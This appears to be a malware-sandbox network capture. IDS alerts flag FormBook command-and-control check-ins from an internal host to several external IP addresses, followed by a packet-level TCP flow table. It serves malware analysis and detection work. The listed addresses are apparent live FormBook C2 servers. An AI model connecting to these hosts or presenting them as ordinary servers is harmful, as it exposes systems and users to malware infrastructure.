2024-11-22T14:44:49.867696+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49707 | 154.216.76.80 | 80 | TCP
2024-11-22T14:44:49.867696+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49707 | 154.216.76.80 | 80 | TCP
2024-11-22T14:45:07.003448+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49709 | 3.33.130.190 | 80 | TCP
2024-11-22T14:45:09.629527+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49710 | 3.33.130.190 | 80 | TCP
2024-11-22T14:45:12.273605+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49711 | 3.33.130.190 | 80 | TCP
2024-11-22T14:45:15.054578+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49712 | 3.33.130.190 | 80 | TCP
2024-11-22T14:45:15.054578+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49712 | 3.33.130.190 | 80 | TCP
2024-11-22T14:45:21.988359+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49713 | 203.161.49.193 | 80 | TCP
2024-11-22T14:45:24.696464+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49714 | 203.161.49.193 | 80 | TCP
2024-11-22T14:45:27.401707+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49715 | 203.161.49.193 | 80 | TCP
2024-11-22T14:45:30.073486+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49716 | 203.161.49.193 | 80 | TCP
2024-11-22T14:45:30.073486+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49716 | 203.161.49.193 | 80 | TCP
2024-11-22T14:45:36.965532+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49717 | 3.33.130.190 | 80 | TCP
2024-11-22T14:45:39.557692+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49718 | 3.33.130.190 | 80 | TCP
2024-11-22T14:45:42.145120+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49719 | 3.33.130.190 | 80 | TCP
2024-11-22T14:45:44.801631+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49720 | 3.33.130.190 | 80 | TCP
2024-11-22T14:45:44.801631+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49720 | 3.33.130.190 | 80 | TCP
2024-11-22T14:45:51.749224+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49721 | 3.33.130.190 | 80 | TCP
2024-11-22T14:45:54.510679+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49722 | 3.33.130.190 | 80 | TCP
2024-11-22T14:45:57.209645+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49723 | 3.33.130.190 | 80 | TCP
2024-11-22T14:45:59.907703+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49724 | 3.33.130.190 | 80 | TCP
2024-11-22T14:45:59.907703+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49724 | 3.33.130.190 | 80 | TCP
2024-11-22T14:46:06.938463+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49725 | 198.252.98.54 | 80 | TCP
2024-11-22T14:46:09.548475+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49726 | 198.252.98.54 | 80 | TCP
2024-11-22T14:46:12.157215+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49727 | 198.252.98.54 | 80 | TCP
2024-11-22T14:46:14.898190+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49728 | 198.252.98.54 | 80 | TCP
2024-11-22T14:46:14.898190+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49728 | 198.252.98.54 | 80 | TCP
2024-11-22T14:46:22.583498+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49729 | 103.224.182.242 | 80 | TCP
2024-11-22T14:46:25.163977+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49730 | 103.224.182.242 | 80 | TCP
2024-11-22T14:46:27.865598+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49731 | 103.224.182.242 | 80 | TCP
2024-11-22T14:46:30.465806+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49732 | 103.224.182.242 | 80 | TCP
2024-11-22T14:46:30.465806+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49732 | 103.224.182.242 | 80 | TCP
2024-11-22T14:46:38.032785+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49733 | 154.23.184.218 | 80 | TCP
2024-11-22T14:46:40.704853+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49734 | 154.23.184.218 | 80 | TCP
2024-11-22T14:46:43.360922+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49735 | 154.23.184.218 | 80 | TCP
2024-11-22T14:46:46.133779+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49736 | 154.23.184.218 | 80 | TCP
2024-11-22T14:46:46.133779+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49736 | 154.23.184.218 | 80 | TCP
2024-11-22T14:46:53.207473+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49737 | 31.31.196.17 | 80 | TCP
2024-11-22T14:46:55.800508+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49738 | 31.31.196.17 | 80 | TCP
2024-11-22T14:46:58.697237+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49739 | 31.31.196.17 | 80 | TCP
2024-11-22T14:47:01.304688+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49740 | 31.31.196.17 | 80 | TCP
2024-11-22T14:47:01.304688+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49740 | 31.31.196.17 | 80 | TCP
2024-11-22T14:47:08.567712+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49741 | 64.190.63.222 | 80 | TCP
2024-11-22T14:47:11.826466+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49742 | 64.190.63.222 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 22, 2024 14:44:48.170980930 CET | 49707 | 80 | 192.168.2.8 | 154.216.76.80
Nov 22, 2024 14:44:48.290842056 CET | 80 | 49707 | 154.216.76.80 | 192.168.2.8
Nov 22, 2024 14:44:48.290934086 CET | 49707 | 80 | 192.168.2.8 | 154.216.76.80
Nov 22, 2024 14:44:48.298755884 CET | 49707 | 80 | 192.168.2.8 | 154.216.76.80
Nov 22, 2024 14:44:48.418308020 CET | 80 | 49707 | 154.216.76.80 | 192.168.2.8
Nov 22, 2024 14:44:49.867388964 CET | 80 | 49707 | 154.216.76.80 | 192.168.2.8
Nov 22, 2024 14:44:49.867465973 CET | 80 | 49707 | 154.216.76.80 | 192.168.2.8
Nov 22, 2024 14:44:49.867696047 CET | 49707 | 80 | 192.168.2.8 | 154.216.76.80
Nov 22, 2024 14:44:49.872209072 CET | 49707 | 80 | 192.168.2.8 | 154.216.76.80
Nov 22, 2024 14:44:49.992161989 CET | 80 | 49707 | 154.216.76.80 | 192.168.2.8
Nov 22, 2024 14:45:05.737591982 CET | 49709 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:05.857315063 CET | 80 | 49709 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:05.857486963 CET | 49709 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:05.868563890 CET | 49709 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:05.988437891 CET | 80 | 49709 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:07.003319979 CET | 80 | 49709 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:07.003448009 CET | 49709 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:07.376720905 CET | 49709 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:07.499356985 CET | 80 | 49709 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:08.396285057 CET | 49710 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:08.515964985 CET | 80 | 49710 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:08.516064882 CET | 49710 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:08.530750990 CET | 49710 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:08.650362015 CET | 80 | 49710 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:09.629456043 CET | 80 | 49710 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:09.629527092 CET | 49710 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:10.032658100 CET | 49710 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:10.159288883 CET | 80 | 49710 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:11.051498890 CET | 49711 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:11.174329042 CET | 80 | 49711 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:11.174442053 CET | 49711 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:11.188309908 CET | 49711 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:11.308115005 CET | 80 | 49711 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:11.308129072 CET | 80 | 49711 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:12.273524046 CET | 80 | 49711 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:12.273605108 CET | 49711 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:12.707086086 CET | 49711 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:12.832832098 CET | 80 | 49711 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:13.729852915 CET | 49712 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:13.851943970 CET | 80 | 49712 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:13.852605104 CET | 49712 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:13.862771034 CET | 49712 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:13.982309103 CET | 80 | 49712 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:15.054389954 CET | 80 | 49712 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:15.054500103 CET | 80 | 49712 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:15.054578066 CET | 49712 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:15.058794975 CET | 49712 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:15.178498030 CET | 80 | 49712 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:20.641294003 CET | 49713 | 80 | 192.168.2.8 | 203.161.49.193
Nov 22, 2024 14:45:20.761279106 CET | 80 | 49713 | 203.161.49.193 | 192.168.2.8
Nov 22, 2024 14:45:20.761464119 CET | 49713 | 80 | 192.168.2.8 | 203.161.49.193
Nov 22, 2024 14:45:20.776297092 CET | 49713 | 80 | 192.168.2.8 | 203.161.49.193
Nov 22, 2024 14:45:20.895860910 CET | 80 | 49713 | 203.161.49.193 | 192.168.2.8
Nov 22, 2024 14:45:21.988147020 CET | 80 | 49713 | 203.161.49.193 | 192.168.2.8
Nov 22, 2024 14:45:21.988270044 CET | 80 | 49713 | 203.161.49.193 | 192.168.2.8
Nov 22, 2024 14:45:21.988358974 CET | 49713 | 80 | 192.168.2.8 | 203.161.49.193
Nov 22, 2024 14:45:22.282715082 CET | 49713 | 80 | 192.168.2.8 | 203.161.49.193
Nov 22, 2024 14:45:23.302525043 CET | 49714 | 80 | 192.168.2.8 | 203.161.49.193
Nov 22, 2024 14:45:23.422454119 CET | 80 | 49714 | 203.161.49.193 | 192.168.2.8
Nov 22, 2024 14:45:23.422671080 CET | 49714 | 80 | 192.168.2.8 | 203.161.49.193
Nov 22, 2024 14:45:23.435933113 CET | 49714 | 80 | 192.168.2.8 | 203.161.49.193
Nov 22, 2024 14:45:23.555372000 CET | 80 | 49714 | 203.161.49.193 | 192.168.2.8
Nov 22, 2024 14:45:24.696316957 CET | 80 | 49714 | 203.161.49.193 | 192.168.2.8
Nov 22, 2024 14:45:24.696399927 CET | 80 | 49714 | 203.161.49.193 | 192.168.2.8
Nov 22, 2024 14:45:24.696464062 CET | 49714 | 80 | 192.168.2.8 | 203.161.49.193
Nov 22, 2024 14:45:24.939084053 CET | 49714 | 80 | 192.168.2.8 | 203.161.49.193
Nov 22, 2024 14:45:25.959274054 CET | 49715 | 80 | 192.168.2.8 | 203.161.49.193
Nov 22, 2024 14:45:26.079114914 CET | 80 | 49715 | 203.161.49.193 | 192.168.2.8
Nov 22, 2024 14:45:26.079272985 CET | 49715 | 80 | 192.168.2.8 | 203.161.49.193
Nov 22, 2024 14:45:26.137670994 CET | 49715 | 80 | 192.168.2.8 | 203.161.49.193
Nov 22, 2024 14:45:26.257467985 CET | 80 | 49715 | 203.161.49.193 | 192.168.2.8
Nov 22, 2024 14:45:26.257585049 CET | 80 | 49715 | 203.161.49.193 | 192.168.2.8
Nov 22, 2024 14:45:27.401501894 CET | 80 | 49715 | 203.161.49.193 | 192.168.2.8
Nov 22, 2024 14:45:27.401572943 CET | 80 | 49715 | 203.161.49.193 | 192.168.2.8
Nov 22, 2024 14:45:27.401706934 CET | 49715 | 80 | 192.168.2.8 | 203.161.49.193
Nov 22, 2024 14:45:27.642143965 CET | 49715 | 80 | 192.168.2.8 | 203.161.49.193
Nov 22, 2024 14:45:28.697917938 CET | 49716 | 80 | 192.168.2.8 | 203.161.49.193
Nov 22, 2024 14:45:28.817729950 CET | 80 | 49716 | 203.161.49.193 | 192.168.2.8
Nov 22, 2024 14:45:28.817909002 CET | 49716 | 80 | 192.168.2.8 | 203.161.49.193
Nov 22, 2024 14:45:28.842729092 CET | 49716 | 80 | 192.168.2.8 | 203.161.49.193
Nov 22, 2024 14:45:28.962469101 CET | 80 | 49716 | 203.161.49.193 | 192.168.2.8
Nov 22, 2024 14:45:30.073261023 CET | 80 | 49716 | 203.161.49.193 | 192.168.2.8
Nov 22, 2024 14:45:30.073277950 CET | 80 | 49716 | 203.161.49.193 | 192.168.2.8
Nov 22, 2024 14:45:30.073486090 CET | 49716 | 80 | 192.168.2.8 | 203.161.49.193
Nov 22, 2024 14:45:30.082729101 CET | 49716 | 80 | 192.168.2.8 | 203.161.49.193
Nov 22, 2024 14:45:30.202449083 CET | 80 | 49716 | 203.161.49.193 | 192.168.2.8
Nov 22, 2024 14:45:35.608947992 CET | 49717 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:35.732158899 CET | 80 | 49717 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:35.732254982 CET | 49717 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:35.744465113 CET | 49717 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:35.864556074 CET | 80 | 49717 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:36.965468884 CET | 80 | 49717 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:36.965532064 CET | 49717 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:37.251415968 CET | 49717 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:37.371037006 CET | 80 | 49717 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:38.270577908 CET | 49718 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:38.390295982 CET | 80 | 49718 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:38.390487909 CET | 49718 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:38.399326086 CET | 49718 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:38.519227982 CET | 80 | 49718 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:39.557591915 CET | 80 | 49718 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:39.557692051 CET | 49718 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:39.907680988 CET | 49718 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:40.027270079 CET | 80 | 49718 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:40.926944017 CET | 49719 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:41.046679020 CET | 80 | 49719 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:41.049298048 CET | 49719 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:41.062104940 CET | 49719 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:41.181890965 CET | 80 | 49719 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:41.181915045 CET | 80 | 49719 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:42.145050049 CET | 80 | 49719 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:42.145119905 CET | 49719 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:42.564510107 CET | 49719 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:42.684248924 CET | 80 | 49719 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:43.583056927 CET | 49720 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:43.702749014 CET | 80 | 49720 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:43.702922106 CET | 49720 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:43.709770918 CET | 49720 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:43.830696106 CET | 80 | 49720 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:44.801428080 CET | 80 | 49720 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:44.801467896 CET | 80 | 49720 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:44.801630974 CET | 49720 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:44.804248095 CET | 49720 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:44.928148031 CET | 80 | 49720 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:50.525703907 CET | 49721 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:50.645358086 CET | 80 | 49721 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:50.645565033 CET | 49721 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:50.654340029 CET | 49721 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:50.777194977 CET | 80 | 49721 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:51.749124050 CET | 80 | 49721 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:51.749223948 CET | 49721 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:52.158586979 CET | 49721 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:52.279269934 CET | 80 | 49721 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:53.200910091 CET | 49722 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:53.320703983 CET | 80 | 49722 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:53.320842981 CET | 49722 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:53.367153883 CET | 49722 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:53.487152100 CET | 80 | 49722 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:54.510565996 CET | 80 | 49722 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:54.510679007 CET | 49722 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:54.876415014 CET | 49722 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:54.997056961 CET | 80 | 49722 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:55.895447969 CET | 49723 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:56.015615940 CET | 80 | 49723 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:56.016102076 CET | 49723 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:56.025079966 CET | 49723 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:56.148356915 CET | 80 | 49723 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:56.148416996 CET | 80 | 49723 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:57.209455967 CET | 80 | 49723 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:57.209645033 CET | 49723 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:57.532665014 CET | 49723 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:57.652303934 CET | 80 | 49723 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:58.553682089 CET | 49724 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:58.673372030 CET | 80 | 49724 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:58.673460960 CET | 49724 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:58.682178974 CET | 49724 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:58.802165031 CET | 80 | 49724 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:59.907481909 CET | 80 | 49724 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:59.907497883 CET | 80 | 49724 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:45:59.907702923 CET | 49724 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:45:59.911556959 CET | 49724 | 80 | 192.168.2.8 | 3.33.130.190
Nov 22, 2024 14:46:00.031241894 CET | 80 | 49724 | 3.33.130.190 | 192.168.2.8
Nov 22, 2024 14:46:05.505717993 CET | 49725 | 80 | 192.168.2.8 | 198.252.98.54
Nov 22, 2024 14:46:05.625442982 CET | 80 | 49725 | 198.252.98.54 | 192.168.2.8
Nov 22, 2024 14:46:05.625533104 CET | 49725 | 80 | 192.168.2.8 | 198.252.98.54
Nov 22, 2024 14:46:05.637442112 CET | 49725 | 80 | 192.168.2.8 | 198.252.98.54
Nov 22, 2024 14:46:05.757121086 CET | 80 | 49725 | 198.252.98.54 | 192.168.2.8
Nov 22, 2024 14:46:06.938314915 CET | 80 | 49725 | 198.252.98.54 | 192.168.2.8
Nov 22, 2024 14:46:06.938333988 CET | 80 | 49725 | 198.252.98.54 | 192.168.2.8
Nov 22, 2024 14:46:06.938462973 CET | 49725 | 80 | 192.168.2.8 | 198.252.98.54
Nov 22, 2024 14:46:07.142316103 CET | 49725 | 80 | 192.168.2.8 | 198.252.98.54
Nov 22, 2024 14:46:08.161606073 CET | 49726 | 80 | 192.168.2.8 | 198.252.98.54
Nov 22, 2024 14:46:08.281200886 CET | 80 | 49726 | 198.252.98.54 | 192.168.2.8
Nov 22, 2024 14:46:08.281480074 CET | 49726 | 80 | 192.168.2.8 | 198.252.98.54
Nov 22, 2024 14:46:08.293920994 CET | 49726 | 80 | 192.168.2.8 | 198.252.98.54
Nov 22, 2024 14:46:08.413511038 CET | 80 | 49726 | 198.252.98.54 | 192.168.2.8
Nov 22, 2024 14:46:09.548312902 CET | 80 | 49726 | 198.252.98.54 | 192.168.2.8
Nov 22, 2024 14:46:09.548413038 CET | 80 | 49726 | 198.252.98.54 | 192.168.2.8
Nov 22, 2024 14:46:09.548475027 CET | 49726 | 80 | 192.168.2.8 | 198.252.98.54
Nov 22, 2024 14:46:09.798337936 CET | 49726 | 80 | 192.168.2.8 | 198.252.98.54
Nov 22, 2024 14:46:10.816610098 CET | 49727 | 80 | 192.168.2.8 | 198.252.98.54
Nov 22, 2024 14:46:10.936160088 CET | 80 | 49727 | 198.252.98.54 | 192.168.2.8
Nov 22, 2024 14:46:10.936403036 CET | 49727 | 80 | 192.168.2.8 | 198.252.98.54
Nov 22, 2024 14:46:10.945439100 CET | 49727 | 80 | 192.168.2.8 | 198.252.98.54
Nov 22, 2024 14:46:11.065754890 CET | 80 | 49727 | 198.252.98.54 | 192.168.2.8
Nov 22, 2024 14:46:11.065810919 CET | 80 | 49727 | 198.252.98.54 | 192.168.2.8
Nov 22, 2024 14:46:12.157075882 CET | 80 | 49727 | 198.252.98.54 | 192.168.2.8
Nov 22, 2024 14:46:12.157130003 CET | 80 | 49727 | 198.252.98.54 | 192.168.2.8
Nov 22, 2024 14:46:12.157215118 CET | 49727 | 80 | 192.168.2.8 | 198.252.98.54
Nov 22, 2024 14:46:12.454662085 CET | 49727 | 80 | 192.168.2.8 | 198.252.98.54
Nov 22, 2024 14:46:13.473866940 CET | 49728 | 80 | 192.168.2.8 | 198.252.98.54
Nov 22, 2024 14:46:13.593575954 CET | 80 | 49728 | 198.252.98.54 | 192.168.2.8
Nov 22, 2024 14:46:13.593729019 CET | 49728 | 80 | 192.168.2.8 | 198.252.98.54
Nov 22, 2024 14:46:13.601231098 CET | 49728 | 80 | 192.168.2.8 | 198.252.98.54
Nov 22, 2024 14:46:13.721007109 CET | 80 | 49728 | 198.252.98.54 | 192.168.2.8
Nov 22, 2024 14:46:14.897952080 CET | 80 | 49728 | 198.252.98.54 | 192.168.2.8
Nov 22, 2024 14:46:14.897975922 CET | 80 | 49728 | 198.252.98.54 | 192.168.2.8
Nov 22, 2024 14:46:14.898190022 CET | 49728 | 80 | 192.168.2.8 | 198.252.98.54
Nov 22, 2024 14:46:14.901071072 CET | 49728 | 80 | 192.168.2.8 | 198.252.98.54
Nov 22, 2024 14:46:15.020648956 CET | 80 | 49728 | 198.252.98.54 | 192.168.2.8
Nov 22, 2024 14:46:21.093620062 CET | 49729 | 80 | 192.168.2.8 | 103.224.182.242
Nov 22, 2024 14:46:21.213851929 CET | 80 | 49729 | 103.224.182.242 | 192.168.2.8
Nov 22, 2024 14:46:21.213979006 CET | 49729 | 80 | 192.168.2.8 | 103.224.182.242
Nov 22, 2024 14:46:21.224944115 CET | 49729 | 80 | 192.168.2.8 | 103.224.182.242
Nov 22, 2024 14:46:21.346292019 CET | 80 | 49729 | 103.224.182.242 | 192.168.2.8
Nov 22, 2024 14:46:22.583301067 CET | 80 | 49729 | 103.224.182.242 | 192.168.2.8
Nov 22, 2024 14:46:22.583431959 CET | 80 | 49729 | 103.224.182.242 | 192.168.2.8
Nov 22, 2024 14:46:22.583498001 CET | 49729 | 80 | 192.168.2.8 | 103.224.182.242
Nov 22, 2024 14:46:22.735939026 CET | 49729 | 80 | 192.168.2.8 | 103.224.182.242
Nov 22, 2024 14:46:23.754286051 CET | 49730 | 80 | 192.168.2.8 | 103.224.182.242
Nov 22, 2024 14:46:23.873990059 CET | 80 | 49730 | 103.224.182.242 | 192.168.2.8
Nov 22, 2024 14:46:23.874175072 CET | 49730 | 80 | 192.168.2.8 | 103.224.182.242
Nov 22, 2024 14:46:23.882862091 CET | 49730 | 80 | 192.168.2.8 | 103.224.182.242
Nov 22, 2024 14:46:24.002579927 CET | 80 | 49730 | 103.224.182.242 | 192.168.2.8
